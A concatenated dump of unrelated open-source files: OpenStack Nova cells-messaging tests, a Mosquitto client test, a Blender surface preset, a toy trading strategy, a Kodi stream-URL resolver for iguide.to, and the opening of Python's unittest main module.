self.mox.StubOutWithMock(inst, 'refresh')
self.mox.StubOutWithMock(inst, 'save')
self.mox.StubOutWithMock(meth_cls.compute_rpcapi, 'backup_instance')
def check_state(expected_task_state=None):
self.assertEqual(task_states.IMAGE_BACKUP, inst.task_state)
inst.refresh()
inst.save(expected_task_state=[None]).WithSideEffects(check_state)
meth_cls.compute_rpcapi.backup_instance(self.ctxt,
inst,
'image-id',
'backup-type',
'rotation')
self.mox.ReplayAll()
class FakeMessage(object):
pass
message = FakeMessage()
message.ctxt = self.ctxt
message.need_response = False
meth_cls.backup_instance(message, inst,
image_id='image-id',
backup_type='backup-type',
rotation='rotation')
def test_set_admin_password(self):
args = ['fake-password']
self._test_instance_action_method('set_admin_password', args, {}, args,
{}, False)
class CellsBroadcastMethodsTestCase(test.NoDBTestCase):
"""Test case for _BroadcastMessageMethods class. Most of these
tests actually test the full path from the MessageRunner through
to the functionality of the message method. Hits 2 birds with 1
stone, even though it's a little more than a unit test.
"""
def setUp(self):
super(CellsBroadcastMethodsTestCase, self).setUp()
fakes.init(self)
self.ctxt = context.RequestContext('fake', 'fake')
self._setup_attrs()
def _setup_attrs(self, up=True):
mid_cell = 'child-cell2'
if up:
src_cell = 'grandchild-cell1'
tgt_cell = 'api-cell'
else:
src_cell = 'api-cell'
tgt_cell = 'grandchild-cell1'
self.src_msg_runner = fakes.get_message_runner(src_cell)
methods_cls = self.src_msg_runner.methods_by_type['broadcast']
self.src_methods_cls = methods_cls
self.src_db_inst = methods_cls.db
self.src_compute_api = methods_cls.compute_api
self.src_ca_rpcapi = methods_cls.consoleauth_rpcapi
if not up:
# fudge things so we only have 1 child to broadcast to
state_manager = self.src_msg_runner.state_manager
for cell in state_manager.get_child_cells():
if cell.name != 'child-cell2':
del state_manager.child_cells[cell.name]
self.mid_msg_runner = fakes.get_message_runner(mid_cell)
methods_cls = self.mid_msg_runner.methods_by_type['broadcast']
self.mid_methods_cls = methods_cls
self.mid_db_inst = methods_cls.db
self.mid_compute_api = methods_cls.compute_api
self.mid_ca_rpcapi = methods_cls.consoleauth_rpcapi
self.tgt_msg_runner = fakes.get_message_runner(tgt_cell)
methods_cls = self.tgt_msg_runner.methods_by_type['broadcast']
self.tgt_methods_cls = methods_cls
self.tgt_db_inst = methods_cls.db
self.tgt_compute_api = methods_cls.compute_api
self.tgt_ca_rpcapi = methods_cls.consoleauth_rpcapi
def test_at_the_top(self):
self.assertTrue(self.tgt_methods_cls._at_the_top())
self.assertFalse(self.mid_methods_cls._at_the_top())
self.assertFalse(self.src_methods_cls._at_the_top())
def test_apply_expected_states_building(self):
instance_info = objects.Instance(vm_state=vm_states.BUILDING)
expected = instance_info.obj_clone()
expected.expected_vm_state = [vm_states.BUILDING, None]
expected_vm_state = self.src_methods_cls._get_expected_vm_state(
instance_info)
self.assertEqual(expected.expected_vm_state, expected_vm_state)
def test_apply_expected_states_resize_finish(self):
instance_info = objects.Instance(task_state=task_states.RESIZE_FINISH)
exp_states = [task_states.RESIZE_FINISH,
task_states.RESIZE_MIGRATED,
task_states.RESIZE_MIGRATING,
task_states.RESIZE_PREP]
expected = instance_info.obj_clone()
expected.expected_task_state = exp_states
expected_task_state = self.src_methods_cls._get_expected_task_state(
instance_info)
self.assertEqual(expected.expected_task_state, expected_task_state)
def _test_instance_update_at_top(self, exists=True):
fake_uuid = fake_server_actions.FAKE_UUID
fake_info_cache = objects.InstanceInfoCache(instance_uuid='fake-uuid')
fake_sys_metadata = {'key1': 'value1',
'key2': 'value2'}
fake_attrs = {'uuid': fake_uuid,
'cell_name': 'fake',
'info_cache': fake_info_cache,
'system_metadata': fake_sys_metadata}
fake_instance = objects.Instance(**fake_attrs)
expected_cell_name = 'api-cell!child-cell2!grandchild-cell1'
def fake_save(instance):
self.assertEqual(fake_uuid, instance.uuid)
self.assertEqual(expected_cell_name, instance.cell_name)
self.assertEqual(fake_info_cache, instance.info_cache)
self.assertEqual(fake_sys_metadata, instance.system_metadata)
@mock.patch.object(objects.Instance, 'save')
@mock.patch.object(objects.Instance, 'create')
def do_test(mock_create, mock_save):
if exists:
mock_save.side_effect = fake_save
else:
error = exception.InstanceNotFound(instance_id='fake_uuid')
mock_save.side_effect = error
self.src_msg_runner.instance_update_at_top(self.ctxt,
fake_instance)
if exists:
mock_save.assert_called_once_with(expected_vm_state=None,
expected_task_state=None)
self.assertFalse(mock_create.called)
else:
mock_save.assert_called_once_with(expected_vm_state=None,
expected_task_state=None)
mock_create.assert_called_once_with()
do_test()
def test_instance_update_at_top(self):
self._test_instance_update_at_top()
def test_instance_update_at_top_does_not_already_exist(self):
self._test_instance_update_at_top(exists=False)
def test_instance_update_at_top_with_building_state(self):
fake_uuid = fake_server_actions.FAKE_UUID
fake_info_cache = objects.InstanceInfoCache(instance_uuid='fake-uuid')
fake_sys_metadata = {'key1': 'value1',
'key2': 'value2'}
fake_attrs = {'uuid': fake_uuid,
'cell_name': 'fake',
'info_cache': fake_info_cache,
'system_metadata': fake_sys_metadata,
'vm_state': vm_states.BUILDING}
fake_instance = objects.Instance(**fake_attrs)
expected_cell_name = 'api-cell!child-cell2!grandchild-cell1'
expected_vm_state = [vm_states.BUILDING, None]
def fake_save(instance):
self.assertEqual(fake_uuid, instance.uuid)
self.assertEqual(expected_cell_name, instance.cell_name)
self.assertEqual(fake_info_cache, instance.info_cache)
self.assertEqual(fake_sys_metadata, instance.system_metadata)
with mock.patch.object(objects.Instance, 'save',
side_effect=fake_save) as mock_save:
self.src_msg_runner.instance_update_at_top(self.ctxt,
fake_instance)
# Check that save is called with the right expected states.
mock_save.assert_called_once_with(
expected_vm_state=expected_vm_state, expected_task_state=None)
def test_instance_destroy_at_top(self):
fake_instance = objects.Instance(uuid='fake_uuid')
with mock.patch.object(objects.Instance, 'destroy') as mock_destroy:
self.src_msg_runner.instance_destroy_at_top(self.ctxt,
fake_instance)
mock_destroy.assert_called_once_with()
def test_instance_destroy_at_top_incomplete_instance_obj(self):
fake_instance = objects.Instance(uuid='fake_uuid')
with mock.patch.object(objects.Instance, 'get_by_uuid') as mock_get:
self.src_msg_runner.instance_destroy_at_top(self.ctxt,
fake_instance)
mock_get.assert_called_once_with(self.ctxt, fake_instance.uuid)
def test_instance_hard_delete_everywhere(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
instance = {'uuid': 'meow'}
# Should not be called in src (API cell)
self.mox.StubOutWithMock(self.src_compute_api, 'delete')
self.mox.StubOutWithMock(self.mid_compute_api, 'delete')
self.mox.StubOutWithMock(self.tgt_compute_api, 'delete')
self.mid_compute_api.delete(self.ctxt, instance)
self.tgt_compute_api.delete(self.ctxt, instance)
self.mox.ReplayAll()
self.src_msg_runner.instance_delete_everywhere(self.ctxt,
instance, 'hard')
def test_instance_soft_delete_everywhere(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
instance = {'uuid': 'meow'}
# Should not be called in src (API cell)
self.mox.StubOutWithMock(self.src_compute_api, 'soft_delete')
self.mox.StubOutWithMock(self.mid_compute_api, 'soft_delete')
self.mox.StubOutWithMock(self.tgt_compute_api, 'soft_delete')
self.mid_compute_api.soft_delete(self.ctxt, instance)
self.tgt_compute_api.soft_delete(self.ctxt, instance)
self.mox.ReplayAll()
self.src_msg_runner.instance_delete_everywhere(self.ctxt,
instance, 'soft')
def test_instance_fault_create_at_top(self):
fake_instance_fault = {'id': 1,
'message': 'fake-message',
'details': 'fake-details'}
if_mock = mock.Mock(spec_set=objects.InstanceFault)
def _check_create():
self.assertEqual('fake-message', if_mock.message)
self.assertEqual('fake-details', if_mock.details)
# Should not be set
self.assertNotEqual(1, if_mock.id)
if_mock.create.side_effect = _check_create
with mock.patch.object(objects, 'InstanceFault') as if_obj_mock:
if_obj_mock.return_value = if_mock
self.src_msg_runner.instance_fault_create_at_top(
self.ctxt, fake_instance_fault)
if_obj_mock.assert_called_once_with(context=self.ctxt)
if_mock.create.assert_called_once_with()
def test_bw_usage_update_at_top(self):
fake_bw_update_info = {'uuid': 'fake_uuid',
'mac': 'fake_mac',
'start_period': 'fake_start_period',
'bw_in': 'fake_bw_in',
'bw_out': 'fake_bw_out',
'last_ctr_in': 'fake_last_ctr_in',
'last_ctr_out': 'fake_last_ctr_out',
'last_refreshed': 'fake_last_refreshed'}
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst, 'bw_usage_update')
self.mox.StubOutWithMock(self.mid_db_inst, 'bw_usage_update')
self.mox.StubOutWithMock(self.tgt_db_inst, 'bw_usage_update')
self.tgt_db_inst.bw_usage_update(self.ctxt, **fake_bw_update_info)
self.mox.ReplayAll()
self.src_msg_runner.bw_usage_update_at_top(self.ctxt,
fake_bw_update_info)
def test_sync_instances(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
project_id = 'fake_project_id'
updated_since_raw = 'fake_updated_since_raw'
updated_since_parsed = 'fake_updated_since_parsed'
deleted = 'fake_deleted'
instance1 = objects.Instance(uuid='fake_uuid1', deleted=False)
instance2 = objects.Instance(uuid='fake_uuid2', deleted=True)
fake_instances = [instance1, instance2]
self.mox.StubOutWithMock(self.tgt_msg_runner,
'instance_update_at_top')
self.mox.StubOutWithMock(self.tgt_msg_runner,
'instance_destroy_at_top')
self.mox.StubOutWithMock(timeutils, 'parse_isotime')
self.mox.StubOutWithMock(cells_utils, 'get_instances_to_sync')
# Middle cell.
timeutils.parse_isotime(updated_since_raw).AndReturn(
updated_since_parsed)
cells_utils.get_instances_to_sync(self.ctxt,
updated_since=updated_since_parsed,
project_id=project_id,
deleted=deleted).AndReturn([])
# Bottom/Target cell
timeutils.parse_isotime(updated_since_raw).AndReturn(
updated_since_parsed)
cells_utils.get_instances_to_sync(self.ctxt,
updated_since=updated_since_parsed,
project_id=project_id,
deleted=deleted).AndReturn(fake_instances)
self.tgt_msg_runner.instance_update_at_top(self.ctxt, instance1)
self.tgt_msg_runner.instance_destroy_at_top(self.ctxt, instance2)
self.mox.ReplayAll()
self.src_msg_runner.sync_instances(self.ctxt,
project_id, updated_since_raw, deleted)
def test_service_get_all_with_disabled(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(objects.ServiceList, 'get_all')
# Calls are made from grandchild-cell to api-cell
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=None).AndReturn([4, 5])
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=None).AndReturn([3])
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=None).AndReturn([1, 2])
self.mox.ReplayAll()
responses = self.src_msg_runner.service_get_all(ctxt,
filters={})
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_service_get_all_without_disabled(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
disabled = False
filters = {'disabled': disabled}
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(objects.ServiceList, 'get_all')
# Calls are made from grandchild-cell to api-cell
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=disabled).AndReturn([4, 5])
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=disabled).AndReturn([3])
objects.ServiceList.get_all(
mox.IgnoreArg(), disabled=disabled).AndReturn([1, 2])
self.mox.ReplayAll()
responses = self.src_msg_runner.service_get_all(ctxt,
filters=filters)
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_task_log_get_all_broadcast(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
task_name = 'fake_task_name'
begin = 'fake_begin'
end = 'fake_end'
host = 'fake_host'
state = 'fake_state'
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(self.src_db_inst, 'task_log_get_all')
self.mox.StubOutWithMock(self.mid_db_inst, 'task_log_get_all')
self.mox.StubOutWithMock(self.tgt_db_inst, 'task_log_get_all')
self.src_db_inst.task_log_get_all(ctxt, task_name,
begin, end, host=host, state=state).AndReturn([1, 2])
self.mid_db_inst.task_log_get_all(ctxt, task_name,
begin, end, host=host, state=state).AndReturn([3])
self.tgt_db_inst.task_log_get_all(ctxt, task_name,
begin, end, host=host, state=state).AndReturn([4, 5])
self.mox.ReplayAll()
responses = self.src_msg_runner.task_log_get_all(ctxt, None,
task_name, begin, end, host=host, state=state)
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_compute_node_get_all(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(objects.ComputeNodeList, 'get_all')
# Calls are made from grandchild-cell to api-cell
objects.ComputeNodeList.get_all(mox.IgnoreArg()).AndReturn([4, 5])
objects.ComputeNodeList.get_all(mox.IgnoreArg()).AndReturn([3])
objects.ComputeNodeList.get_all(mox.IgnoreArg()).AndReturn([1, 2])
self.mox.ReplayAll()
responses = self.src_msg_runner.compute_node_get_all(ctxt)
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_compute_node_get_all_with_hyp_match(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
hypervisor_match = 'meow'
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(objects.ComputeNodeList, 'get_by_hypervisor')
# Calls are made from grandchild-cell to api-cell
objects.ComputeNodeList.get_by_hypervisor(
ctxt, hypervisor_match).AndReturn([4, 5])
objects.ComputeNodeList.get_by_hypervisor(
ctxt, hypervisor_match).AndReturn([3])
objects.ComputeNodeList.get_by_hypervisor(
ctxt, hypervisor_match).AndReturn([1, 2])
self.mox.ReplayAll()
responses = self.src_msg_runner.compute_node_get_all(ctxt,
hypervisor_match=hypervisor_match)
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_compute_node_stats(self):
# Reset this, as this is a broadcast down.
self._setup_attrs(up=False)
ctxt = self.ctxt.elevated()
self.mox.StubOutWithMock(self.src_db_inst,
'compute_node_statistics')
self.mox.StubOutWithMock(self.mid_db_inst,
'compute_node_statistics')
self.mox.StubOutWithMock(self.tgt_db_inst,
'compute_node_statistics')
self.src_db_inst.compute_node_statistics(ctxt).AndReturn([1, 2])
self.mid_db_inst.compute_node_statistics(ctxt).AndReturn([3])
self.tgt_db_inst.compute_node_statistics(ctxt).AndReturn([4, 5])
self.mox.ReplayAll()
responses = self.src_msg_runner.compute_node_stats(ctxt)
response_values = [(resp.cell_name, resp.value_or_raise())
for resp in responses]
expected = [('api-cell!child-cell2!grandchild-cell1', [4, 5]),
('api-cell!child-cell2', [3]),
('api-cell', [1, 2])]
self.assertEqual(expected, response_values)
def test_consoleauth_delete_tokens(self):
fake_uuid = 'fake-instance-uuid'
# To show these should not be called in src/mid-level cell
self.mox.StubOutWithMock(self.src_ca_rpcapi,
'delete_tokens_for_instance')
self.mox.StubOutWithMock(self.mid_ca_rpcapi,
'delete_tokens_for_instance')
self.mox.StubOutWithMock(self.tgt_ca_rpcapi,
'delete_tokens_for_instance')
self.tgt_ca_rpcapi.delete_tokens_for_instance(self.ctxt, fake_uuid)
self.mox.ReplayAll()
self.src_msg_runner.consoleauth_delete_tokens(self.ctxt, fake_uuid)
def test_bdm_update_or_create_with_none_create(self):
fake_bdm = {'id': 'fake_id',
'volume_id': 'fake_volume_id'}
expected_bdm = fake_bdm.copy()
expected_bdm.pop('id')
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_update_or_create')
self.tgt_db_inst.block_device_mapping_update_or_create(
self.ctxt, expected_bdm, legacy=False)
self.mox.ReplayAll()
self.src_msg_runner.bdm_update_or_create_at_top(self.ctxt,
fake_bdm,
create=None)
def test_bdm_update_or_create_with_true_create(self):
fake_bdm = {'id': 'fake_id',
'volume_id': 'fake_volume_id'}
expected_bdm = fake_bdm.copy()
expected_bdm.pop('id')
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_create')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_create')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_create')
self.tgt_db_inst.block_device_mapping_create(
self.ctxt, fake_bdm, legacy=False)
self.mox.ReplayAll()
self.src_msg_runner.bdm_update_or_create_at_top(self.ctxt,
fake_bdm,
create=True)
def test_bdm_update_or_create_with_false_create_vol_id(self):
fake_bdm = {'id': 'fake_id',
'instance_uuid': 'fake_instance_uuid',
'device_name': 'fake_device_name',
'volume_id': 'fake_volume_id'}
expected_bdm = fake_bdm.copy()
expected_bdm.pop('id')
fake_inst_bdms = [{'id': 1,
'volume_id': 'not-a-match',
'device_name': 'not-a-match'},
{'id': 2,
'volume_id': 'fake_volume_id',
'device_name': 'not-a-match'},
{'id': 3,
'volume_id': 'not-a-match',
'device_name': 'not-a-match'}]
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_get_all_by_instance')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_update')
self.tgt_db_inst.block_device_mapping_get_all_by_instance(
self.ctxt, 'fake_instance_uuid').AndReturn(
fake_inst_bdms)
# Should try to update ID 2.
self.tgt_db_inst.block_device_mapping_update(
self.ctxt, 2, expected_bdm, legacy=False)
self.mox.ReplayAll()
self.src_msg_runner.bdm_update_or_create_at_top(self.ctxt,
fake_bdm,
create=False)
def test_bdm_update_or_create_with_false_create_dev_name(self):
fake_bdm = {'id': 'fake_id',
'instance_uuid': 'fake_instance_uuid',
'device_name': 'fake_device_name',
'volume_id': 'fake_volume_id'}
expected_bdm = fake_bdm.copy()
expected_bdm.pop('id')
fake_inst_bdms = [{'id': 1,
'volume_id': 'not-a-match',
'device_name': 'not-a-match'},
{'id': 2,
'volume_id': 'not-a-match',
'device_name': 'fake_device_name'},
{'id': 3,
'volume_id': 'not-a-match',
'device_name': 'not-a-match'}]
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_get_all_by_instance')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_update')
self.tgt_db_inst.block_device_mapping_get_all_by_instance(
self.ctxt, 'fake_instance_uuid').AndReturn(
fake_inst_bdms)
# Should try to update ID 2.
self.tgt_db_inst.block_device_mapping_update(
self.ctxt, 2, expected_bdm, legacy=False)
self.mox.ReplayAll()
self.src_msg_runner.bdm_update_or_create_at_top(self.ctxt,
fake_bdm,
create=False)
def test_bdm_destroy_by_volume(self):
fake_instance_uuid = 'fake-instance-uuid'
fake_volume_id = 'fake-volume-name'
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_destroy_by_instance_and_volume')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_destroy_by_instance_and_volume')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_destroy_by_instance_and_volume')
self.tgt_db_inst.block_device_mapping_destroy_by_instance_and_volume(
self.ctxt, fake_instance_uuid, fake_volume_id)
self.mox.ReplayAll()
self.src_msg_runner.bdm_destroy_at_top(self.ctxt, fake_instance_uuid,
volume_id=fake_volume_id)
def test_bdm_destroy_by_device(self):
fake_instance_uuid = 'fake-instance-uuid'
fake_device_name = 'fake-device-name'
# Shouldn't be called for these 2 cells
self.mox.StubOutWithMock(self.src_db_inst,
'block_device_mapping_destroy_by_instance_and_device')
self.mox.StubOutWithMock(self.mid_db_inst,
'block_device_mapping_destroy_by_instance_and_device')
self.mox.StubOutWithMock(self.tgt_db_inst,
'block_device_mapping_destroy_by_instance_and_device')
self.tgt_db_inst.block_device_mapping_destroy_by_instance_and_device(
self.ctxt, fake_instance_uuid, fake_device_name)
self.mox.ReplayAll()
self.src_msg_runner.bdm_destroy_at_top(self.ctxt, fake_instance_uuid,
device_name=fake_device_name)
def test_get_migrations(self):
self._setup_attrs(up=False)
filters = {'status': 'confirmed'}
migrations_from_cell1 = [{'id': 123}]
migrations_from_cell2 = [{'id': 456}]
self.mox.StubOutWithMock(self.mid_compute_api,
'get_migrations')
self.mid_compute_api.get_migrations(self.ctxt, filters).\
AndReturn(migrations_from_cell1)
self.mox.StubOutWithMock(self.tgt_compute_api,
'get_migrations')
self.tgt_compute_api.get_migrations(self.ctxt, filters).\
AndReturn(migrations_from_cell2)
self.mox.ReplayAll()
responses = self.src_msg_runner.get_migrations(
self.ctxt,
None, False, filters)
self.assertEqual(2, len(responses))
for response in responses:
self.assertIn(response.value_or_raise(), [migrations_from_cell1,
migrations_from_cell2])
@mock.patch.object(objects.KeyPair, 'get_by_name',
return_value='fake_keypair')
def test_get_keypair_at_top(self, fake_get_by_name):
user_id = 'fake_user_id'
name = 'fake_keypair_name'
responses = self.src_msg_runner.get_keypair_at_top(self.ctxt,
user_id, name)
fake_get_by_name.assert_called_once_with(self.ctxt, user_id, name)
for response in responses:
if response.value is not None:
self.assertEqual('fake_keypair', response.value)
@mock.patch.object(objects.KeyPair, 'get_by_name')
def test_get_keypair_at_top_with_objects_exception(self, fake_get_by_name):
user_id = 'fake_user_id'
name = 'fake_keypair_name'
keypair_exception = exception.KeypairNotFound(user_id=user_id,
name=name)
fake_get_by_name.side_effect = keypair_exception
responses = self.src_msg_runner.get_keypair_at_top(self.ctxt,
user_id,
name)
fake_get_by_name.assert_called_once_with(self.ctxt, user_id, name)
for response in responses:
self.assertIsNone(response.value)
@mock.patch.object(messaging._BroadcastMessage, 'process')
def test_get_keypair_at_top_with_process_response(self, fake_process):
user_id = 'fake_user_id'
name = 'fake_keypair_name'
response = messaging.Response(self.ctxt, 'cell', 'keypair', False)
other_response = messaging.Response(self.ctxt, 'cell',
'fake_other_keypair', False)
fake_process.return_value = [response, other_response]
responses = self.src_msg_runner.get_keypair_at_top(self.ctxt,
user_id, name)
fake_process.assert_called_once_with()
self.assertEqual(fake_process.return_value, responses)
class CellsPublicInterfacesTestCase(test.NoDBTestCase):
"""Test case for the public interfaces into cells messaging."""
def setUp(self):
super(CellsPublicInterfacesTestCase, self).setUp()
fakes.init(self)
self.ctxt = context.RequestContext('fake', 'fake')
self.our_name = 'api-cell'
self.msg_runner = fakes.get_message_runner(self.our_name)
self.state_manager = self.msg_runner.state_manager
@mock.patch.object(messaging, '_TargetedMessage')
def test_resize_instance(self, mock_message):
instance = objects.Instance(cell_name='api-cell!child-cell')
flavor = 'fake'
extra_instance_updates = {'fake': 'fake'}
clean_shutdown = True
self.msg_runner.resize_instance(self.ctxt, instance, flavor,
extra_instance_updates,
clean_shutdown=clean_shutdown)
extra_kwargs = dict(flavor=flavor,
extra_instance_updates=extra_instance_updates,
clean_shutdown=clean_shutdown)
method_kwargs = {'instance': instance}
method_kwargs.update(extra_kwargs)
mock_message.assert_called_once_with(self.msg_runner, self.ctxt,
'resize_instance',
method_kwargs, 'down',
instance.cell_name,
need_response=False)
|
ecaldwe1/zika | refs/heads/master | website/tests/__init__.py | 17 | # Copyright (C) 2016, University of Notre Dame
# All rights reserved
|
saapooch/Carl-Chandra-Analysis | refs/heads/master | strategies/base.py | 1 | import random
class Decision(object):
def __init__(self, ticker=None, action=None, amount=None, error=None):
self.ticker = ticker
self.action = action
self.amount = amount
self.error = error
def __repr__(self):
return 'Decision(%s, %s, %s, %s)' % (self.ticker, self.action, self.amount, self.error)
class BaseStrategy(object):
def __init__(self, portfolio=None):
self.portfolio = portfolio
class RandomStrategy(BaseStrategy):
"""
A test strategy. Should take what day it is and then simply output a decision
"""
def create_decisions(self, date):
decisions = []
for key,value in self.portfolio.stocks.items():
power = random.uniform(0, 1)
if power < .5:
d = Decision(ticker=key, action=0, amount=5)
else:
d = Decision(ticker=key, action=1, amount=5)
decisions.append(d)
return decisions
|
DavideCanton/Python3 | refs/heads/master | prove_igraph/__init__.py | 27 | __author__ = 'davide'
|
PaoloMissier/IoT-tracking | refs/heads/master | VAUGHN/broker/mosquitto-1.4.10_CASS/test/lib/01-no-clean-session.py | 10 | #!/usr/bin/env python
# Test whether a client produces a correct connect with clean session not set.
# The client should connect to port 1888 with keepalive=60, clean session not
# set, and client id 01-no-clean-session.
import inspect
import os
import socket
import sys
# From http://stackoverflow.com/questions/279237/python-import-a-module-from-a-folder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"..")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import mosq_test
rc = 1
keepalive = 60
connect_packet = mosq_test.gen_connect("01-no-clean-session", clean_session=False, keepalive=keepalive)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(10)
sock.bind(('', 1888))
sock.listen(5)
client_args = sys.argv[1:]
env = dict(os.environ)
env['LD_LIBRARY_PATH'] = '../../lib:../../lib/cpp'
try:
pp = env['PYTHONPATH']
except KeyError:
pp = ''
env['PYTHONPATH'] = '../../lib/python:'+pp
client = mosq_test.start_client(filename=sys.argv[1].replace('/', '-'), cmd=client_args, env=env)
try:
(conn, address) = sock.accept()
conn.settimeout(10)
if mosq_test.expect_packet(conn, "connect", connect_packet):
rc = 0
conn.close()
finally:
client.terminate()
client.wait()
sock.close()
exit(rc)
|
Microvellum/Fluid-Designer | refs/heads/master | win64-vc/2.78/Python/bin/2.78/scripts/addons/presets/operator/mesh.primitive_xyz_function_surface/klein.py | 3 | import bpy
op = bpy.context.active_operator
op.x_eq = '(3*(1+sin(v)) + 2*(1-cos(v)/2)*cos(u))*cos(v)'
op.y_eq = '(4+2*(1-cos(v)/2)*cos(u))*sin(v)'
op.z_eq = '-2*(1-cos(v)/2)*sin(u)'
op.range_u_min = 0.0
op.range_u_max = 6.2831854820251465
op.range_u_step = 32
op.wrap_u = True
op.range_v_min = 0.0
op.range_v_max = 6.2831854820251465
op.range_v_step = 128
op.wrap_v = False
op.close_v = False
op.n_eq = 1
op.a_eq = '0'
op.b_eq = '0'
op.c_eq = '0'
op.f_eq = '0'
op.g_eq = '0'
op.h_eq = '0'
|
sanctuaryaddon/sanctuary | refs/heads/master | script.module.liveresolver/lib/liveresolver/resolvers/iguide.py | 2 | # -*- coding: utf-8 -*-
import re,urlparse,json
from liveresolver.modules import client,constants
from liveresolver.modules.log_utils import log
def resolve(url):
#try:
try: referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
except: referer = url
try:
channel = urlparse.parse_qs(urlparse.urlparse(url).query)['channel'][0]
except:
channel = re.compile('/embed/(\d+)&').findall(url)[0]
page = 'http://www.iguide.to/embedplayer_new.php?width=700&height=410&channel=%s&autoplay=true' % channel
log(page)
headers = {'Host':'www.iguide.to','Connection':'keep-alive'}
result = client.request(page, referer=referer,headers = headers)
log(result)
token_url =re.compile('\$.getJSON\("(.+?)", function\(json\){').findall(result)[0]
token = json.loads(client.request(token_url, referer=referer))['token']
file = re.compile('(?:\'|\")?file(?:\'|\")?\s*:\s*(?:\'|\")(.+?)(?:\'|\")').findall(result)[0].replace('.flv','')
rtmp = re.compile('(?:\'|\")?streamer(?:\'|\")?\s*:\s*(?:\'|\")(.+?)(?:\'|\")').findall(result)[0].replace(r'\\','\\').replace(r'\/','/')
app = re.compile('.*.*rtmp://[\.\w:]*/([^\s]+)').findall(rtmp)[0]
url=rtmp + ' playpath=' + file + ' swfUrl=http://www.iguide.to/player/secure_player_iguide_token.swf flashver=' + constants.flash_ver() + ' live=1 timeout=15 token=' + token + ' swfVfy=1 pageUrl='+page
return url
#except:
# return
|
brokenjacobs/ansible | refs/heads/devel | lib/ansible/modules/net_tools/basics/__init__.py | 12133432 | |
reinout/django | refs/heads/master | tests/migrations/test_migrations_squashed_complex/__init__.py | 12133432 | |
wf4ever/ro-manager | refs/heads/master | src/roweb/__init__.py | 12133432 | |
ismk/Python-Examples | refs/heads/master | learn python the hard way/ex34.py | 12133432 | |
sgzsh269/django | refs/heads/master | tests/template_backends/apps/good/__init__.py | 12133432 | |
thnee/ansible | refs/heads/devel | lib/ansible/module_utils/network/vyos/config/__init__.py | 12133432 | |
sbarakat/graph-partitioning | refs/heads/master | graph_partitioning/partitioners/__init__.py | 12133432 | |
Event38/MissionPlanner | refs/heads/master | Lib/unittest/main.py | 53 | """Unittest main program"""
import sys
import os
import types
from . import loader, runner
from .signals import installHandler
__unittest = True
FAILFAST = " -f, --failfast Stop on first failure\n"
CATCHBREAK = " -c, --catch Catch control-C and display results\n"
BUFFEROUTPUT = " -b, --buffer Buffer stdout and stderr during test runs\n"
USAGE_AS_MAIN = """\
